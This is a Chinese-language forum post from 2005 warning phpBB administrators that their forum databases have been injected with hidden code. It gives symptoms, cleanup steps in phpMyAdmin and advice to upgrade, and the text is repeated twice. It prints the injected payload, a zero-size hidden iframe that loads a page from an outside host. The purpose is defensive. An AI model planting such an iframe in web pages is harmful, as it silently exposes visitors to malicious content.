最近一堆PHPBB論壇資料庫然未被植入隱碼
發表於: 2005年 5月 4日, 21:08最近處理了許客戶論壇被植入隱碼,包含本公司的論壇,通常多是利用論壇的漏洞,稿的我門公司連夜換成vBulletin
請檢查一下你的論壇是否有同樣的狀況
1.看看你的論壇左上角是不是出現向附圖的狀況
2.如果你使用PC-cillin掃毒進入網站首頁會有病毒警告如下圖
除理方法:
1.間清除你網頁的暫存檔
2.先打用phpmyadmin打開你的資料庫,找到你PHPBB或是其他論壇
找到phpbb_forums這各資料表
找看看裡面所有欄位
應該會有被植入下面的幾行程式
檢查所有欄位看到以上程式碼就清除
你也可以用搜尋的功能搜尋這段程式碼
看被植入在哪各欄位
2.立即更新你的論壇軟體,不然你會再次被攻擊
PHPBB請立即更新到2.0.15
請檢查一下你的論壇是否有同樣的狀況
1.看看你的論壇左上角是不是出現向附圖的狀況
2.如果你使用PC-cillin掃毒進入網站首頁會有病毒警告如下圖
除理方法:
1.間清除你網頁的暫存檔
2.先打用phpmyadmin打開你的資料庫,找到你PHPBB或是其他論壇
找到phpbb_forums這各資料表
找看看裡面所有欄位
應該會有被植入下面的幾行程式
- 代碼: 選擇全部
<iframe src="[url=http://gamania.go.zccn.net/x/hinet.htm]http://gamania.go.zccn.net/x/hinet.htm[/url]" width=0 height=0 frameborder=0></iframe>
檢查所有欄位看到以上程式碼就清除
你也可以用搜尋的功能搜尋這段程式碼
看被植入在哪各欄位
2.立即更新你的論壇軟體,不然你會再次被攻擊
PHPBB請立即更新到2.0.15